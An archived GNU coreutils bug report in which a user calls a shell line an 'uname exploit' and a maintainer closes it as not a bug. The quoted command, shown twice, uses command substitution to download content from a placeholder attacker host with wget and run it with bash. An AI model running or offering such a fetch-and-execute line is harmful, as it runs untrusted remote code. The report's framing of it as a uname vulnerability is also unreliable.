GNU bug report logs - #24328
uname exploit

Package: coreutils

Reported by: Shane <linuxshane <at> gmail.com>

Date: Mon, 29 Aug 2016 15:28:01 UTC

Severity: normal

Done: Paul Eggert <eggert <at> cs.ucla.edu>

Bug is archived. No further changes may be made.

From: help-debbugs <at> gnu.org (GNU bug Tracking System)
To: Shane <linuxshane <at> gmail.com>
Subject: bug#24328: closed (Re: bug#24328: uname exploit)
Date: Mon, 29 Aug 2016 15:59:02 +0000
[Message part 1 (text/plain, inline)]
Your bug report

#24328: uname exploit

which was filed against the coreutils package, has been closed.

The explanation is attached below, along with your original report.
If you require more details, please reply to 24328 <at> debbugs.gnu.org.

-- 
24328: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=24328
GNU Bug Tracking System
Contact help-debbugs <at> gnu.org with problems
[Message part 2 (message/rfc822, inline)]
From: Paul Eggert <eggert <at> cs.ucla.edu>
To: Shane <linuxshane <at> gmail.com>, 24328-done <at> debbugs.gnu.org
Subject: Re: bug#24328: uname exploit
Date: Mon, 29 Aug 2016 08:58:40 -0700
Shane wrote:
> uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"

I don't see a bug here, so I'm marking this as done.

[Message part 3 (message/rfc822, inline)]
From: Shane <linuxshane <at> gmail.com>
To: bug-coreutils <at> gnu.org
Subject: uname exploit
Date: Mon, 29 Aug 2016 02:25:03 -0500
Hi, I am unsure if you have seen this, but I am concerned about this - 
can or should uname be restricted to root use only?

uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"





This bug report was last modified 8 years and 328 days ago.
